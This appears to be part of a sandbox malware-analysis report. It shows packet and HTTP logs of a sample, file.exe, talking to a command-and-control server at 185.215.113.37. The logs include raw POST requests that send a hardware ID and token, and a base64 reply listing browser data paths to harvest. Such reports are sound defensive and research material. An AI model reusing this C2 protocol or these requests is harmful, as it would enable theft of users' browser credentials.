Oct 25, 2024 05:21:16.308733940 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.308748007 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.308758974 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:16.308764935 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.308779955 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.308788061 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:16.308794975 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.308805943 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:16.308810949 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.308819056 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:16.308828115 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.308835983 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:16.308835983 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:16.308842897 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.308868885 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:16.308868885 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:16.308892012 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:16.308962107 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.308979988 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.308996916 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.309011936 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.309022903 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:16.309029102 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.309052944 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:16.309173107 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:16.309636116 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.309660912 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.309675932 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.309686899 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:16.309732914 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.309747934 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.309758902 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:16.309791088 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:16.395973921 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:16.401424885 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.675957918 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.675988913 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.676004887 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.676019907 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.676034927 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.676134109 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:16.676134109 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:16.676134109 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:16.676146984 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.676170111 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.676171064 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:16.676187038 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.676192999 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:16.676202059 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.676208973 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:16.676218987 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.676232100 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:16.676235914 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.676244020 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:16.676260948 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.676265955 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:16.676278114 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.676280022 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:16.676294088 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.676307917 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.676321983 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.676335096 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.676348925 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.676357031 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.676372051 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.676387072 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.676407099 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.676422119 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.676436901 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.676450968 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.676465988 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.676476955 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:16.676481009 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.676476955 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:16.676476955 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:16.676476955 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:16.676476955 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:16.676476955 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:16.676476955 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:16.676476955 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:16.676496029 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.676511049 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.676525116 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.676537991 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:16.676538944 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.676537991 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:16.676537991 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:16.676537991 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:16.676563025 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.676565886 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:16.676565886 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:16.676585913 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.676593065 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:16.676603079 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.676618099 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.676625967 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:16.676625967 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:16.676632881 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.676640987 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:16.676649094 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.676662922 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.676676989 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.676681042 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:16.676681995 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:16.676691055 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.676703930 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:16.676703930 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:16.676707983 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.676717997 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:16.676723957 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.676731110 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:16.676739931 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.676747084 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:16.676799059 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.676815033 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.676825047 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:16.676830053 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.676855087 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:16.676858902 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.676883936 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.676898003 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.676909924 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:16.676912069 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.676934958 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.676939964 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:16.676953077 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.676975012 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.676980019 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:16.676991940 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.677006006 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.677007914 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:16.677027941 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.677031994 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:16.677031994 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:16.677042961 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.677051067 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:16.677064896 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.677081108 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.677089930 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:16.677094936 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.677102089 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:16.677110910 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.677124977 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.677134037 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:16.677134037 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:16.677140951 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.677145958 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:16.677156925 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.677167892 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:16.677171946 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.677189112 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.677196026 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:16.677196026 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:16.677208900 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:16.677237034 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.677283049 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:16.677303076 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.677325964 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.677340031 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.677355051 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.677369118 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.677393913 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:16.677423000 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.677423954 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:16.677423954 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:16.677438021 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.677453995 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.677468061 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.677483082 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:16.677484035 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.677493095 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:16.677516937 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:16.677542925 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:16.677608013 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:17.263565063 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:17.263612032 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:17.268939018 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:17.268955946 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:18.062882900 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:18.063081026 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:18.141117096 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:18.146497011 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:18.423449993 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:18.423474073 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:18.423485994 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:18.423561096 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:18.423562050 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:18.425611019 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:18.430959940 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:18.708187103 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:18.708336115 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:18.719177008 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:18.724646091 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:19.500777960 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:19.500932932 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:19.525682926 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:19.531121016 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:19.815174103 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:19.815198898 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:19.815212011 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:19.815224886 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:19.815237999 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:19.815238953 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:19.815274954 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:19.817483902 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:19.822779894 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:20.595556974 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:20.596721888 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:25.652523041 CEST	49730	80	192.168.2.4	185.215.113.37

HTTP Request Dependency Graph

185.215.113.37

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	185.215.113.37	80	7352	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 05:21:03.077980042 CEST	89	OUT	GET / HTTP/1.1 Host: 185.215.113.37 Connection: Keep-Alive Cache-Control: no-cache
Oct 25, 2024 05:21:03.979990959 CEST	203	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 03:21:03 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 25, 2024 05:21:03.982623100 CEST	412	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HDGIJJDGCBKFIDHIEBKE Host: 185.215.113.37 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 44 47 49 4a 4a 44 47 43 42 4b 46 49 44 48 49 45 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 42 34 34 31 37 42 41 42 46 38 32 38 37 36 35 33 34 35 39 32 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 49 4a 4a 44 47 43 42 4b 46 49 44 48 49 45 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 49 4a 4a 44 47 43 42 4b 46 49 44 48 49 45 42 4b 45 2d 2d 0d 0a Data Ascii: ------HDGIJJDGCBKFIDHIEBKEContent-Disposition: form-data; name="hwid"F1B4417BABF82876534592------HDGIJJDGCBKFIDHIEBKEContent-Disposition: form-data; name="build"doma------HDGIJJDGCBKFIDHIEBKE--
Oct 25, 2024 05:21:04.277571917 CEST	407	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 03:21:04 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 180 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 4f 47 59 77 59 57 59 32 5a 47 5a 6b 4d 54 55 32 4e 47 49 33 4f 54 4a 6d 4e 44 4e 68 4e 6a 63 32 4e 6d 56 68 4e 6d 5a 69 5a 54 6b 35 59 6a 42 68 5a 54 41 34 4f 44 55 78 4f 57 4a 6c 4e 32 55 31 5a 6d 49 79 5a 6a 46 6c 4d 7a 5a 69 59 7a 52 6a 59 6a 51 31 4d 6d 45 34 4f 54 4d 34 4f 44 4d 33 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 77 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d Data Ascii: OGYwYWY2ZGZkMTU2NGI3OTJmNDNhNjc2NmVhNmZiZTk5YjBhZTA4ODUxOWJlN2U1ZmIyZjFlMzZiYzRjYjQ1MmE4OTM4ODM3fHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDB8MHwxfDF8MXwxfDF8MXwwfHlibmNiaHlsZXBtZXw=
Oct 25, 2024 05:21:04.278753042 CEST	469	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CAKKEGDGCGDAKEBFIJEC Host: 185.215.113.37 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 41 4b 4b 45 47 44 47 43 47 44 41 4b 45 42 46 49 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 66 30 61 66 36 64 66 64 31 35 36 34 62 37 39 32 66 34 33 61 36 37 36 36 65 61 36 66 62 65 39 39 62 30 61 65 30 38 38 35 31 39 62 65 37 65 35 66 62 32 66 31 65 33 36 62 63 34 63 62 34 35 32 61 38 39 33 38 38 33 37 0d 0a 2d 2d 2d 2d 2d 2d 43 41 4b 4b 45 47 44 47 43 47 44 41 4b 45 42 46 49 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 43 41 4b 4b 45 47 44 47 43 47 44 41 4b 45 42 46 49 4a 45 43 2d 2d 0d 0a Data Ascii: ------CAKKEGDGCGDAKEBFIJECContent-Disposition: form-data; name="token"8f0af6dfd1564b792f43a6766ea6fbe99b0ae088519be7e5fb2f1e36bc4cb452a8938837------CAKKEGDGCGDAKEBFIJECContent-Disposition: form-data; name="message"browsers------CAKKEGDGCGDAKEBFIJEC--
Oct 25, 2024 05:21:04.566432953 CEST	1236	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 03:21:04 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 1520 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 53 42 44 59 57 35 68 63 6e 6c 38 58 45 64 76 62 32 64 73 5a 56 78 44 61 48 4a 76 62 57 55 67 55 33 68 54 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 56 47 39 79 59 32 68 38 58 46 52 76 63 6d 4e 6f 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 78 57 61 58 5a 68 62 47 52 70 66 46 78 57 61 58 5a 68 62 47 52 70 58 46 [TRUNCATED] Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8R29vZ2xlIENocm9tZSBDYW5hcnl8XEdvb2dsZVxDaHJvbWUgU3hTXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8VG9yY2h8XFRvcmNoXFVzZXIgRGF0YXxjaHJvbWV8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q29jQ29jfFxDb2NDb2NcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDZW50IEJyb3dzZXJ8XENlbnRCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8MHw3U3RhcnxcN1N0YXJcN1N0YXJcVXNlciBEYXRhfGNocm9tZXwwfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8MzYwIEJyb3dzZXJ8XDM2MEJyb3dzZXJcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8UVFCcm93c2VyfFxUZW5jZW50XFFRQnJvd3Nl
Oct 25, 2024 05:21:04.566507101 CEST	512	IN	Data Raw: 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 33 4a 35 63 48 52 76 56 47 46 69 66 46 78 44 63 6e 6c 77 64 47 39 55 59 57 49 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 Data Ascii: clxVc2VyIERhdGF8Y2hyb21lfDB8Q3J5cHRvVGFifFxDcnlwdG9UYWIgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyb3dzZXIuZXhlfE9wZXJhIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE9wZXJhIEdYIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE1vemlsbGEgRml
